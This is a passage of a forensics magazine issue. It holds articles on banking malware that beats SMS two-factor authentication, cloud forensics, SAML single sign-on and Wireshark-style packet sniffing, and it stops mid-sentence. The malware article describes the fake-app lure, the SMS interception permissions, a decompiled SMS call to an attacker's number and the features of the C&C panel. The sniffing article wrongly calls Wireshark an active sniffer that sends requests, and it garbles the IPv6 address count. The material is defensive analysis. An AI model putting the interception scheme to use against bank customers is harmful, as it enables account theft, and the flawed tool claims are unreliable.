ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY? TARGETING ITALIAN BANK AND CUSTOMERS by Davide Cioccia and Senad Aruch During last few years banks, and different financial institutions, have been trying to protect or prevent fraud and cyber-attacks from accessing their customers’ credentials. They increased security and login factors to avoid these kind of problems. One of these is the Two Factor Authentication (2FA), used to “help” username and password to protect the bank account. What you will learn: H owever today, this system is hackable by malicious users. Trend Micros said: • How the financial cybercrime is evolving “The attack is designed to bypass a certain two-factor authentication scheme used by banks. In particular, it bypasses session tokens, which are • How the new security solutions frequently sent to users’ mobile devices via Short Message Service (SMS). mobile-based are bypassed Users are expected to enter a session token to activate banking sessions so they can authenticate their identities. Since this token is sent through a • How the attacker can control and steal your money separate channel, this method is generally considered secure”. What you should know: This article is a real User Case of this kind of malicious software. During our recent malware analysis targeting Italian financial institutions, we found • A basic knowledge of how the two a very powerful piece of it that can bypass the 2FA with a malicious app in- factor authentication works stalled on the phone. Malware like this can drive the user to download the fake application on their phone from the official Google Play Store, using a • Familiarity with Android/iOS app Man in the browser attack (MITB). Once on the user’s PC, the attacker can requirements take full control of the machine and interact with him through a Command and Control (C&C) server. What we explain in this article is a real active botnet • What is a MITB attack with at least 40-compromised zombie hosts. 14 www.eForensicsMag.com

HOW THE 2FA IS BYPASSED During the last few days, we are seeing criminals developing more sophisticated solutions and have increasing knowledge in mobile and web programming. This scenario is increasing throughout the en- tire world; though concentrated mostly in Europe. Criminals are developing solutions to bypass the 2FA used by the 90% of banks developing “legal” application published in the Google Play Store and Apple App Store. These applications can steal information on the phone, intercept and send it over the network silently. The last operation named “Operation Emmenthal”, discovered by Trend Micro is acting in just this way. In this section, we will discover how a criminal can force a user to download and install the mobile application. When malware infects the machine, and the user navigates to the online banking platform, a MITB at- tack starts injecting JavaScript code inside the browser. This injection modifies some data in the page while keeping the same structure. During the navigation the hacked website will invite the user to down- load the fake application, explaining all the steps to insert their bogus data. The app can be downloaded in two different ways: SMS (inserting your number in the fake form you will receive an SMS with the download link from the store) Here a screenshot of a received SMS. The fake app name remember many programs used to encrypt and share sensitive information. People can trust this app because of the name. Figure 1. Sms sent by attackers to download the apk QR CODE A QR Code is showed with a MITB attack, during the online banking website navigation. Here, a screen- shot of the image is used to redirect the user on the Google Play Store. 15 www.eForensicsMag.com

Figure 2. QR Code used to download the apk A case of QR codes is reported by Trend Micro in this image. When the users did not use the SMS or the link inside the web page a QR-code appears. Scanning it with any QR reader in the store, the user will be redirect to the Google Play Store to download the app. Figure 3. Every single pass is given by the attackers as reported below: STEP ONE When the Google Play Store is opened, click on the “install” button and “Accept” the app authorization. Right are requested to send, receive, intercept, SMS, and read/write on the file system. 16 www.eForensicsMag.com

Figure 4. Description provided by attackers: • Secure sms transmission with asymmetric encryption, totaly automaticaly. • Totaly secure sms. • Private-key infrastructure (PKI). • Comfortable and easy use, one time installation. • This application is created to protect sensetive data received over sms. • Even if the sms is intersepted nothing can be reached from the encrypted text. • The encrypted text can only be decrypted by your personal private key, generated just after the first launch. • Each key is unique and has its own identification number. Functionality: • A Keypair is created after first launch. • A unique identification number is granted. • With the Private Key you decrypt messages, received from the trusted saurses. • Send your Private Key Identifiction Number to the organization which wants to send you an encrypt- ed message. The organization encrypts the message with your Private Key and sends the encrypt- ed message to you. ONLY YOU can decrypt the encrypted Message with your Private Key. Instruction: • Doqnload and install the app. • Launch the aplication. • Waint till your private kay is generated. • Share your Private Key identification number. The description is full of orthographic errors, and this means that they are not from an English- speak- ing country. 17 www.eForensicsMag.com

Analyzing the -apk and decompiling it we found the rights requested by the malicious app. <uses-permission android:name=”android.permission.SEND_SMS” /> <uses-permission android:name=”android.permission.RECEIVE_SMS” /> <uses-permission android:name=”android.permission.WRITE_EXTERNAL_STORAGE” /> STEP TWO Once installed, you need to open the app on your phone to see a Random Number Generator. Users need to insert this user inside the online banking account to login inside the portal. Trend Micro says: At this stage, the users have to enter the password that was “generated” by the fake app. The app has a preset list of possible passwords and just randomly chooses one. The Web page, meanwhile, simply checks if one of those possible passwords was entered. Guessing numbers does not work, the users will not be able to proceed with the fake banking authentication. Figure 5. Installing the Android app allows the attackers to gain full control of the users’ online banking sessions because, in reality, it intercepts session tokens sent via SMS to users’ phones, which are then forward- ed to the cybercriminals. The spoofed website allows the attackers to obtain the users’ login credentials while the mobile app intercepts real session tokens sent by the banks. As a result, the attackers obtain everything they need to fake user’s online banking transactions. The app waits for an SMS from the user bank, which provides a OTP or a legitimate token .tok. When they are received, the app hijacks the communication in the background and forwards the stolen data to a number with an encrypted SMS. Here a decompiled piece of code used to test the availability of the server: Settings.sendSms(this, new MessageItem(“+39366134xxxx”, “Hello are you there?”)) Communication start with a simple SMS, requesting service availability. When an SMS is received from a bank number, the interception starts, and an encrypted sms is sent with the stolen information. 18 www.eForensicsMag.com

C&C CENTER FUNCTION DETAILS During our code analysis we found a link to a JavaScript file used by criminals during the injection pro- cess in the MITB attack. Going deeply into the obfuscated code, we found a link to a C&C server where data is sent. Behind the front-end, which was password protected, we saw a custom control panel used to control the botnet. Every single bot is represented in a table and is controlled with the panel. The first screen you can see behind the login panel is a statistic page with the number of compromised hosts. Figure 6. In the second one (Logs), there is all the information about the bots. Every single user is cataloged with these parameters: • Used browser • Last operation on that bot • IP • Login • Password • User • Type (file, flash) • PIN • Action (request data login) As you can see in the panel showed below, in the C&C Server attackers have all that they need to ac- cess an online banking website with stolen credentials. This panel is very powerful because can perform a request to the infected user to insert another time in his credentials. Figure 7. www.eForensicsMag.com 19

Clicking on the icons on the right, it is possible to send the request to a bot. Figure 8. Analyzing every single bot it is possible to see more details about them; this, by clicking on the PIN. The third page is the JS page, used by the attacker to inject code inside the bot browser. To enable the form, there is a hidden command discovered through the JavaScript code analysis of that page. Figure 9. The fourth section is the jabber page, where an attacker can change his XMPP username and pass- word, and the last page is dedicated to set the password for this panel. Figure 10. www.eForensicsMag.com 20

Figure 11. CONCLUSION The platform used by this hacker is very powerful because it is not only a drop-zone where data is sent, but it is a real C&C server. They can interact with malware and can send it commands to execute on the infected machine. This kind of methodology is increasing every day and the attackers have more so- phisticated resources like a Windows malware, a malicious Android app, a rogue DNS resolver server, a phishing Web server with fake bank site pages, and a compromised C&C server. Banks that use this kind of authentication are exposing users to rogue app. Today there are a more secure ways to access an online banking portal, like card readers, TAN, Multi- ple factor authentication, but they are more sophisticated and slow. We want to move fast, without any single problem and slowdown. But this is good for our online bank account? STATISTICS The attack is alive and the number of the hacked users is increasing every day. We have detected more than 40 hacked hosts and accounts until now. REFERENCES http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf ABOUT THE AUTHORS Davide Cioccia is a Security Consultant at Reply s.p.a – Communication Valley – Security Operations Center in Italy. Msc in Computer Engineering with Master Thesis about a new way to combat the Advanced Persistent Threat and Microsoft Certified Professional (MCP,MS) he carried out many article about the financial cybercrime, botnet, drop zone and APT. Key assignments include anti-fraud management, Anti-Phishing services for financial institute, Drop Zone and Malware Analy- sis, Cyber Intelligence platform development. E-Mail: [email protected] Twitter: https://twitter.com/david107 LinkedIn: https://www.linkedin.com/in/davidecioccia Senad Aruch. Multiple Certified ISMS Professional with 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security. E-Mail: [email protected] Blog: www.senadaruc.com Twitter: https://twitter.com/senadaruch LinkedIn: https://www.linkedin.com/in/senadaruc 21 www.eForensicsMag.com

AN OVERVIEW OF CLOUD FORENSICS by Dejan Lukan When discussing cloud forensics, we’re actually talking about the intersection between cloud computing and network forensic analysis. Cloud computing basically refers to a network service that we can interact with over the network; this usually means that all the work is done by a server somewhere on the Internet, which might be backed up by physical or virtual hardware. In recent years, there has been a significant increase on the use of virtualized environments, which makes it very probable that our cloud service is running somewhere in a virtualized environment. T here are many benefits of virtualized servers, which we won’t go into now, but the most prominent ones are definitely low cost, ease of use, and the ability to move them around in seconds without service down- time. Basically, cloud computing is just a fancy term created by marketing people, but we’ve all been using it for years. A good example of cloud com- puting is an email service where we don’t have to install an email client on our local computer to access our new email and which serves as storage for all email. Instead, everything is already done by the cloud, the email messages are stored on the cloud and, even if we switch to a different computer, we on- ly need to login with our web browser and everything is there. Therefore, we only need an interface with which we can access our cloud application, which in the previous example is simply a web browser. Cloud computing has many benefits, but the two most distinct disadvantages are definitely security and privacy. Since we store all data in our cloud somewhere on the Internet, the cloud provider has access to our data, and so does an attacker if a breach occurs in the provider’s network. Network forensic analysis is part of the digital forensics branch, which monitors and analyzes computer network traffic for the purposes of gath- ering information, collecting legal evidence, or detecting intrusions [1]. When talking about network forensics, we’re actually talking about the data that has been transmitted over the network, which might serve as the only evidence of an intrusion or malicious activity. Obviously that’s not always the case, since an intruder often leaves evidence on the hard disk of the 22 www.eForensicsMag.com

compromised host as well in the form of log files, uploaded malicious files, etc. But when the attacker is very careful not to leave any traces on the compromised computer, the only evidence that we might have is in the form of captured network traffic. When capturing network traffic, we most often want to separate the good data from the bad by extracting useful information from the traffic, such as transmit- ted files, communication messages, credentials, etc. If we have a lot of disk space available, we can also store all the traffic to disk and analyze it at a later time if needed, but obviously this requires a great amount of disk space. Usually we use network forensics to discover security attacks being con- ducted over the network. We can use a tool like tcpdump or Wireshark to perform network analysis on the network traffic. CLOUD COMPUTING Let’s talk a little bit about deployment models of cloud computing, which are described below (summa- rized after [2]): • Private cloud – The services of a private cloud are used only by a single organization and are not exposed to the public. A private cloud is hosted inside the organization and is behind a firewall, so the organization has full control of who has access to the cloud infrastructure. The virtual machines are then still assigned to a limited number of users. • Public cloud – The services of a public cloud are exposed to the public and can be used by anyone. Usually the cloud provider offers a virtualized server with an assigned IP address to the customer. An example of a public cloud is Amazon Web Services (AWS). • Community cloud – The services of a community cloud are used by several organizations to lower the costs, as compared to a private cloud. • Hybrid cloud – The services of a hybrid cloud can be distributed in multiple cloud types. An example of such a deployment is when sensitive information is kept in private cloud services by an internal appli- cation. That application is then connected to the application on a public cloud to extend the application functionality. • Distributed cloud – The services of a distributed cloud are distributed among several machines at different locations but connected to the same network. The service models of cloud computing are the following (summarized after [2]): • IaaS (infrastructure as a service) provides the entire infrastructure, including physical/virtual ma- chines, firewalls, load balancers, hypervisors, etc. When using IaaS, we’re basically outsourcing a complete traditional IT environment where we’re renting a complete computer infrastructure that can be used as a service over the Internet. • PaaS (platform as a service) provides a platform such as operating system, database, web server, etc. We’re renting a platform or an operating system from the cloud provider. • SaaS (software as a service) provides access to the service, but you don’t have to manage it be- cause it’s done by the service provider. When using SaaS, we’re basically renting the right to use an application over the Internet. There are also other service models that we might encounter: • Desktop as a service – We’re connecting to a desktop operating system over the Internet, which en- ables us to use it from anywhere. It’s also not affected if our own physical laptop gets stolen, be- cause we can still use it. • Storage as a service – We’re using storage that physically exists on the Internet as it is present lo- cally. This is very often used in cloud computing and is the primary basis of a NAS (network at- tached storage) system. • Database as a service – Here we’re using a database service installed in the cloud as if it was in- stalled locally. One great benefit of using database as a service is that we can use highly configur- able and scalable databases with ease. • Information as a service – We can access any data in the cloud by using the defined API as if it was present locally. • Security as a service – This enables the use of security services as if they were implemented locally. There are other services that exist in the cloud, but we’ve presented just the most widespread ones that are used on a daily basis. 23 www.eForensicsMag.com

If we want to start using the cloud, we need to determine which service model we want to use. The de- cision largely depends on what we want to deploy to the cloud. If we would like to deploy a simple web application, we might want to choose an SaaS solution, where everything will be managed by the service provides and we only have to worry about writing the application code. An example of this is writing an application that can run on Heroku. We can think of the service models in the term of layers, where the IaaS is the bottom layer, which gives us the most access to customize most of the needed infrastructure. The PaaS is the middle layer, which automates certain things, but is less configurable. The top layer is SaaS, which offers the least configura- tion, but automates a large part of the infrastructure that we need when deploying an application. CLOUD NETWORK FORENSICS The first thing that we need to talk about is defining why cloud network forensics is even necessary. The answer to that is rather simple: because of attackers trying to hack our cloud services. We need to be notified when hackers are trying to gain access to our cloud infrastructure, platform, or service. Let’s look at an example. Let’s imagine that company X is running a service Y in the cloud; the service is very important and has to be available 24/7. If the service is down for a few hours, it could mean a consider- able financial loss for X’s site. When such an attack occurs, the company X must hire a cloud forensics expert to analyze the available information. The forensic analyzer must look through all the logs on the compromised service to look for forensic evidence. The forensics analyzer soon discovers that the at- tack was conducted from the cloud provider’s network, so he asks the cloud provider to give him the logs that he needs. At this point, we must evaluate what logs the forensics investigator needs in order to find our who was behind the attack. This is where cloud network forensics comes into play. Basically, we need to take the digital forensics process and apply it to the cloud, where we need to analyze the information we have about filesystems, processes, registry, network traffic, etc. When collecting the information that we can analyze, we must know which service model is in use, because collecting the right information depends on it. When using different service models, we can access different types of information, as is shown in the table below [3,4]. If we need additional information from the service model that we’re using, which are not specified in the table below, we need to contact the cloud service provider and they can send us the required information. The table below presents different columns, where the first column contains differ- ent layers that we might have access to when using cloud services. The SaaS, PaaS, and IaaS columns show the access rights we have when using various service models and the last column presents the information we have available when using a local computer that we have physical access to. Information SaaS PaaS IaaS Local Networking Storage Servers Virtualization OS Middleware Runtime Data Application Access Control It’s evident from the table that, when using a local computer, we have maximum access, which is why the analysis of a local machine is the most complete. I intentionally didn’t use the term “easiest,” because that’s not true, since when we have maximum access to the computer, there are multiple evidences that we can collect and analyze. The problem with cloud services is that the evidence needs to be provided by the CSP (cloud service provider): If we want to get application logs, database logs, or network logs 24 www.eForensicsMag.com

when using the SaaS service model, we need to contact the service provider in order to get it, because we can’t access it by ourselves. Another problem is that the user’s data is kept together with the data of other users on the same storage system, so it’s hard to separate just the data that we need to conduct an analysis. If two users are using the same web server for hosting a web page, how can we prove that the server’s log contains the data of the user that we’re after? This is quite a problem when doing a fo- rensic analysis of the cloud service. Let’s describe every entry from the table above, so it will make more sense. • Networking – In a local environment, we have access to the network machines, such as switches, routers, IDS/IPS systems, etc. We can access all of the traffic passing through the network and ana- lyze it as a part of gathering as much data as we possibly can. When using the cloud, even the CSP doesn’t have that kind of data, because it mustn’t log all the traffic passing through the network, since users’ data is confidential and CSP can’t record, store, and analyze it. The CSP might only ap- ply the IDS/IPS solution to the network, which is only analyzing traffic for malicious behavior and alerting the provider of such activity. • Storage – When we have hardware access to the machine, we know exactly where the data is locat- ed but, when using a cloud service, the data could be anywhere, even in different states, countries, or even continents. • Servers – In a traditional system, we have physical access to the machine, which is why we can ac- tually go to the machine and analyze the data on it; all the data is local to the machine. This isn’t possible when using the cloud, because the data is dispersed through multiple data centers and it’s hard to confirm that we’ve actually collected all the needed data. • Virtualization – In a local environment, we have access to the virtualization environment, where we can access the hypervisor, manage existing virtual machines, delete a virtual machine, or create a new virtual machine. In the public cloud, we normally don’t have access to the hypervisor, but if we absolutely must have access, we can run a private cloud. • OS – In a local environment, we have complete access to the operating system as we do in the IaaS model, but not in the PaaS and SaaS models. If we want access to the operating system, we could connect to the SSH service running on the server and issue OS commands, which we can’t do when using Heroku, for example. • Middleware – The middleware connects two separate endpoints, which together form a whole appli- cation. For example, we might have a database running on a backend systems and the web applica- tion connects to those databases by using different techniques. • Runtime – When using the IaaS model, we can influence how the application is started and stopped, so we have access to its runtime. • Data/application – In PaaS and IaaS models, we have access to all of the data and applications, which we can manage by using search, delete, add, etc. We can’t do that directly when using the SaaS model. • Access control – In all service models, we have access to the access control because, without it, we wouldn’t have been able to access the service. We can control how access is granted to different users of the application. When conducting forensic analysis in the traditional way, we can simply hire a forensics expert to collect all the data and analyze it from the local machine. In a cloud service, we can do the same, but we must also cooperate with the cloud service provider, which might not have the forensics experts available or simply might not care and therefore won’t provide us with all the data that we need. CONCLUSION In this article, we’ve seen that, when conducting a cloud network forensic analysis, we do not have ac- cess to the same information as we do when conducting an analysis of a normal local computer system. We often do not have access to the information that we’re after and must ask the cloud service provider to furnish the information we need. The problem with such data is that we must trust the cloud service provider to give us the right information; they might give us false information or hold back some very im- portant information. This is just another problem when trying to use the data in court, because we must prove without a doubt that the evidence from the collected data belongs to the user; the process of col- lecting the data, preserving it, and analyzing it must be documented and acceptable in the court of law. 25 www.eForensicsMag.com

When an attack has occurred on a cloud service, there are a lot of different problems we need to ad- dress, but the most important of them is communication with our cloud service provider. Because the services are located in the cloud, there is a lot of information that could serve as evidence which can only be provided by the CSP, since only the cloud provider has access to it. Therefore, there are also other problems with gathering the data when working with cloud environments, such as data being located in multiple data centers located around the globe, data of different users being located in the same storage device, etc. There is still a lot of research that must be done in order to improve forensic examination of cloud ser- vices. There is also a lack of professional cloud forensic experts, which are expected to increase in the next couple of years. REFERENCES [1] Gary Palmer, A Road Map for Digital Forensic Research, Report from DFRWS 2001, First Digital Forensic Research Workshop, Utica, New York, August 7 – 8, 2001, Page(s) 27–30. [2] Cloud computing, Wikipedia, https://en.wikipedia.org/wiki/Cloud_computing. [3] Digital Forensics in the Cloud, Shams Zawoad, University of Alabama at Birmingham, Ragib Hasan, University of Alabama at Bir- mingham. [4] Pentest Magazine, Vol.1, No.4, Issue 04/2011(04) August, Aaron Bryson, Great Pen Test Coverage: Too Close For Missiles, Switching to Bullets. ABOUT THE AUTHOR Dejan Lukan is a security researcher for InfoSec Institute and penetration tester from Slovenia. He is very interested in finding new bugs in real world software products with source code analysis, fuzzing and reverse engineering. He also has a great pas- sion for developing his own simple scripts for security related problems and learning about new hacking techniques. He knows a great deal about programming languages, as he can write in couple of dozen of them. 26 www.eForensicsMag.com

AUTHENTICATING REMOTE ACCESS FOR GREATER CLOUD SECURITY by David Hald, co-founder, chief relation officer The nature and pace of business have changed as technology has opened new possibilities for organizations. One of these possibilities is cloud services, which benefit companies by enabling remote access to data stored offsite. Its convenience has made cloud services incredibly popular, both to business and malicious actors. With so much data at stake, the rise in the use of remote access necessitates ironclad security. Authenticating the identities of users remotely accessing these resources has never been more critical. A ccording to Javelin Strategy & Research’s 2014 Identity Fraud Study, a new identity fraud victim was hit every two seconds in America last year, an increase of over half a million people since 2012. Despite the rise in identity and data theft, many authentication methods still rely on usernames and passwords to protect employees, customers and da- ta. Today’s cybercriminals are increasingly sophisticated in their attacks, and yesterday’s authentication methods are simply inadequate. SECURITY NEEDS HAVE CHANGED Organizations are granting access to cloud-based business solutions such as Microsoft Office 365, Salesforce and Google Apps to an increasing number of end-users. Some cloud solutions offer generic security measures for authen- ticating users who access these systems in the cloud. This approach gives the end-user the responsibility of choosing what type of security to use and forces the user to rely on personal judgment to determine whether the secu- rity is strong enough to protect access effectively. 27 www.eForensicsMag.com

It has become increasingly obvious that usernames and passwords are ineffective ways of authenticat- ing access, yet their use is still widespread as users balk at more cumbersome forms of authentication like tokens and certificates. While simple user names and passwords are no longer effective, the amount of data stored in the cloud continues to escalate. Cloud providers must accommodate access to millions of users from all over the world. A centralized breach in a cloud-based solution would pose a serious risk to the data of thousands – if not more – organizations. Therefore, end-users should select cloud provid- ers that offer strong, flexible security that is extremely hard to compromise yet easy to use. A CENTRALIZED SECURITY APPROACH In light of the increasing need for stronger security for cloud access, businesses have begun to implement standards for authenticating users. One of the major problems organizations face is how to manage user identities in the cloud. To manage cloud identities, IT departments must often maintain an additional set of user credentials for each and every cloud solution used by their employees. This approach requires cum- bersome procedures and extra work for IT. To bypass this problem, IT should use a centralized method that gives each user a single identity that provides access to a variety of different cloud solutions. A centralized method like this ensures that those who access an organization’s assets have been pre- qualified. It provides strong authentication while also freeing end-users from being dependent on specific software, hardware or features for greater flexibility and convenience. SAVING TIME WITH SAML With the ability to allow secure Web domains to exchange user authentication and authorization data, Security Assertion Markup Language, or SAML, is one way to provide effective and easy identity man- agement in the cloud. A SAML setup requires three roles: the end-user, the service provider and the iden- tity provider. The service provider role is held by cloud solutions, such as Microsoft Office 365, Salesforce or Google Apps. The identity provider role handles user authentication and identity management for the service provider, and can be used as a centralized system to handle authentication and identity manage- ment for multiple service providers at once. By using a SAML identity provider, organizations can gain all the recognized benefits that are traditionally associated with on-premise authentication solutions. SAML frees organizations from having to maintain multiple instances of user credentials, one in the lo- cal area network (LAN) and multiple in the cloud. In this way, SAML is a time saver. This way, the organi- zation can keep its authentication and security mechanisms the same for all users, regardless of whether they are accessing data in the cloud or on the LAN, thus saving time and money while boosting security. MAKE SECURE AUTHENTICATION YOUR GOAL Cloud services offer convenient remote access to organizations, but they can also open the door for identity theft if the cloud security system relies on outdated methods such as usernames and passwords. The threat is real, and growing, so organizations must scrutinize the security that a cloud provider offers before closing a deal and make secure, authenticated cloud access for end-users their goal regardless of whether it’s offered by the cloud provider. For their part, cloud providers must make it their goal to cre- ate a secure and easy-to-use authentication method. The stakes are too high not to. ABOUT THE AUTHOR David Hald is a founding member of SMS PASSCODE A/S, where he acts as a liaison and a promoter of the award-winning SMS PASSCODE multi-factor authentication solutions. Prior to founding SMS PASSCODE A/S, he was a co-founder and CEO of Conecto A/S, a leading consulting company within the area of mo- bile- and security solutions with special emphasis on Citrix, Blackberry and other advanced mobile solutions. In Conecto A/S David has worked with strategic and tactic implementation in many large IT-projects. David has also been CTO in companies funded by Teknologisk Innovation and Vækstfonden. Prior to founding Conecto, he has worked as a software developer and project manager, and has headed up his own software consulting company. David has a technical background from the Computer Science Institute of Copenhagen University (DIKU). 28 www.eForensicsMag.com

PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLS by Eric A. Vanderburg Almost every computer today is connected. Their communication with others takes the form of packets which can be analyzed to determine the facts of a case. Packet sniffers are also called as network analyzers as it helps in monitoring every activity that is performed over the Internet. The information from packet sniffing can be used to analyze the data packets that uncover the source of problems in the network. The important feature of packet sniffing is that it captures data that travels through the network, irrespective of the destination. A log file will be generated at the end of every operation performed by the packet sniffer and the log file will contain the information related to the packets. E very packet has a header and body, where the header contains infor- mation about the source of the packet and the body contains the actual information about the transfer. There are packet sniffer tools that are available online and many of them are open source tools and hence they are available free of cost. How, when and where should this be performed to col- lect the best data in a defensible manner? Attend this workshop to find out. WHAT IS PACKET ANALYSIS? Investigations cannot always be contained to a single computer, especially with the way systems are connected these days. Right now, your computer may be connected to dozens of different computers, some to check for soft- ware updates, others to gather tweets, email, or RSS feeds. Some connec- tions could be used to authenticate to a domain or access network resources. Now consider an investigation and the potential importance this information could have to it. 29 www.eForensicsMag.com

Network communication over an Internet Protocol (IP) network can best be understood as a set of packets that form a communication stream. A machine may send and receive thousands of packets per minute and computer networks are used to send these packets to their destination. Packet capture tools can be used to analyze this communication to determine how a computer or user interacted with other devices on the network. Packet analysis can capture these packets so that they can be reviewed to de- termine what communication took place. Packet analysis is called as packet sniffing or protocol analysis. A tool that is used for packet analysis is called packet sniffer or packet capture tool. It captures raw data across the wire which helps in analyzing which parties are communicating on the network, what data is flowing, how much data is being transmit- ted and what network services are in use. PACKET SNIFFING PROCESS Packet sniffing can be divided into three steps. The first step is collection when the software gathers all data traversing the network card it is bound to. Next, the data is converted to a form that the program can read and lastly, the program presents the data to be analyzed and can perform pre-programmed analy- sis techniques on the data. OSI NETWORK MODEL Before you can analyze packets, you need to understand how network communication takes place. The OSI network model is a conceptual framework that describes that activities performed to communi- cate on a network. TOOLS There are various packet sniffing tools available on the market. Some popular packet capture tools in- clude Wireshark, Network Miner and NetWitness Investigator, which we will see in detail. All three of these tools are free to download and use and they can be operated in both command line program for- mat and GUI format. Of the three, Wireshark is the most popular packet sniffer tool that is used worldwide for its ease of installation, ease of use, etc. More importantly, it is an open source tool that is available free of cost. The tool also provides advanced options that will enable forensic investigator or network administrators to delve deep in the packets and capture information. It supports operating systems and numerous pro- tocols, and media types. There are numerous packet sniffer tools available for network administrators to analyze and under- stand the traffic flow across the network. It is always difficult to zero down on the best of the lot as almost of them perform required functions seamlessly. Still, there are factors in which they can be ranked and classified as the top packet sniffing tools. The following three tools are identified to be the best in the mar- ket, already serving millions of computers from identifying serious threats. Let’s get in detail with each of the three packet sniffing tools and understand why they are ranked in such order. WIRESHARK Wireshark is a popular open source packet sniffer that performs functions such as network troubleshooting, data analysis, protocol development, etc. The tool uses latest available platforms and forensic investigator or network administrator interface toolkit for serving network administrators. The development version of Wireshark uses Qt while the current releases use GTK+ toolkit. The major advantage of using Wireshark is that it supports multiple platforms, operating systems and protocols. Wireshark comes in both graphi- cal forensic investigator or network administrator interface format and command mode format. Wireshark includes network interface controllers that make it possible for the traffic flowing across the network to be captured via packets. Otherwise, only specified data that is routed to a destination will be captured. Wireshark supports various protocols and media types. The approximate number of protocols sup- ported by Wireshark is more than 900, and this count goes on increasing as and when an update is re- leased. The primary reason for the increase in count of supported protocols is the open source nature of the tool. Developer has the freedom to develop code for including their new protocol into Wireshark. The Wireshark development team reviews the code that you send and include them in the tool. This makes it possible for protocol to be supported by Wireshark. Also, Wireshark supports major oper- ating systems ranging from Windows; MAC to Linux-based operating systems. 30 www.eForensicsMag.com

The other major reason for Wireshark to remain on top of a user’s list of best packet sniffers is its ease of use. The graphical user interface of the tool is one of the simplest and easiest, available in the online world. The menus are clear with a simple layout, and raw data are represented graphically. This makes it easier for novices to get along with the tool in the early stages of their career. The common problem that users face when using open source software is a lack of proper program support. Wireshark has a highly active forensic investigator or network administrator community that can be ranked as the best among the open source projects. The development team also provides an email subscription of forensic investigator or network administrators on latest updates and FAQs. Wireshark is very easy to install, and the required system configuration is very minimal as well. Wire- shark requires a minimum of 400 MHz of processor speed and 60 MB of free storage. The system should have WinPCap capture driver and a network interface card that supports promiscuous mode and this requires user to have administrator access on the system being used. Once you are sure that your system has the given configuration, you can install the tool in very short time. Since there will not be data for the first time you open Wireshark, it will not be easier to judge the forensic investigator or network administrator interface. Installing Wireshark tool is as simple as installing other software in the Windows system. All you need to do is double click the executable file for the installer to open up. Agree to the terms and conditions and select the components you need to be installed along with the packet sniffing tool. Certain components are selected by default, and they are enough for basic operations. Ensure that you select the Install Win- PCap option and verify that the WinPCap installation window is displayed some time after Wireshark main installation has started. When the installation is complete, open the tool and select Capture button from the main drop down menu and select interfaces from which you need data to be captured. This will initiate your first data capture using Wireshark, and the main window will then be filled with data that can be used by the user. Figure 1. Home Window of Wireshark www.eForensicsMag.com 31

Figure 2. Selecting Interfaces The main window of Wireshark is where the data that are collected are presented to the forensic in- vestigator or network administrator. Hence, this will be a place where most of the time in the tool will be spent. The main window is broken down into three panes that are interlinked with each other. The three panes are packet list pane, packet details pane and packet bytes pane. The packet list dis- plays the packets that are available for forensic investigator or network administrator analysis. On select- ing packet, the corresponding packet details are displayed in the packet details pane. The corresponding size of the packets will be displayed in the packet bytes pane. The packet list pane displays the packet number and the time at which the packet was captured by the tool. It also displays the source and desti- nation of the packet and other information related to the packet such as packet protocol, etc. The packet bytes pane displays the raw data in the same form as it was originally captured and cannot be of more use. More information about Wireshark can be found at https://www.wireshark.org/. The tool can also be downloaded from the site. Figure 3. Main Window NETWORK MINER Network Miner is a packet analysis tool that also includes the ability to perform packet sniffing. It is avail- able for Windows, Linux and MAC OS. It is passive packet capturing tool that detects operating systems, traffic, and network ports. On the contrary, Wireshark is an active packet capturing tool. 32 www.eForensicsMag.com

The difference between an active and passive packet sniffing tool is that in active sniffing, the sniffing tool sends the request over the network and uses the response to capture packets while passive sniff- ing does not send request for receiving a response. It simply scans the traffic without getting noticed in the network. The places where passive sniffing comes in handy are radar systems, telecommunication and medical equipment, and many others. Another difference between active and passive sniffing technique is that the latter uses host-centric approach which means it uses hosts for sorting out data while active sniffing uses packets. Similar to Wireshark, network miner also comes with easy to use interface, simple instal- lation and ease of use. NETWITNESS INVESTIGATOR The NetWitness Investigator is the packet sniffing tool that is a result of 10 years of research and de- velopment has been used in most complex threat environments. The Netwitness investigator has been used only with critical environments for so long, but the company has released the free version of the software, making it available for the public as well. The investigator captures live packets from both wire- less and wired network interfaces. It supports most major packet capture systems. The free version of the tool allows 25 simultaneous users to capture data up to a maximum of 1 GB. The tool has other interesting features such as effectively analyzing the data in layers of networking, from users email addresses, files, IPv6 support, full content searching, exporting the information col- lected in PCAP format, and others.As the number of users using the internet has grown over the years, it was important for the Internet Engineering Task Force to come up with unique IP addresses that can be used for new devices. IPv6 will replace the current generation IPv4 protocol. The introduction of IPv6 allows increased number of IP addresses which helps more users to communicate over the internet. This is because, IPv4 addresses are only 32 bits long that supports 4.3 billion addresses whereas IPv6 addresses are 128 bits long and supports over hundred trillion and trillion addresses. With new set of protocols used for communication, it is important for the forensic tools to provide support for the protocols for seamless operation. NetWitness Investigator thus provides support for IPv6 which will be the future of all internet communication. Every new release of the tool comes in which many new features that may not be available in other packet sniffing tool. Netwitness investigator requires certain minimum configuration support for installation. The tool can be installed in windows operat- ing system, with at least 1 GB RAM, 1 Ethernet port, a large amount of data storage, etc. The free version of the tool supports only the Windows operating system while the commercial version pro- vides support for Linux as well. One important feature of investigator is that it does not alert forensic investigator or network administrators for problems in network based on known threats. Instead, it catches packets in real time and analyzes the network for differences in behavior and reports the same to the forensic investigator or network administrator immediately. The commercial version of the software brings in more benefits when compared to the free version. Some of the features that are present only in enterprise version are support for Linux platform, remote network monitoring, in- former, decoder and automated reporting engine. HOW PACKET ANALYZERS WORK Packet analyzers intercept network traffic that travel through the wired and wireless network interfaces that they have access to. The structure of the network along with how network switches and other tools are configured decides what information can be captured. In a switched wired network, the sniffer can capture data from only the switch port it is attached to unless port mirroring is implemented on the switch. However, with wireless, the packet sniffing tool can capture data from only one channel, unless there are multiple interfaces that allow data to be captured from more than one channel. RFC 5474 is a frame- work that is used for selection of packets and reporting them. It uses the PSAMP framework which se- lects packets in statistical methods and exports the packets to the collectors. RFC 5475 describes the various techniques of packet selection that are supported by PSAMP. These frameworks help users per- form the processes seamlessly. The data that is received initially will be in raw format that only the software can understand. It needs to be converted to human readable form for the forensic investigator or network administrator to inter- pret. The tool performs this operation in the process called conversion. The data can then be analyzed, and necessary information can be obtained. Thus, the place where the fault is present can be identified, and 33 www.eForensicsMag.com

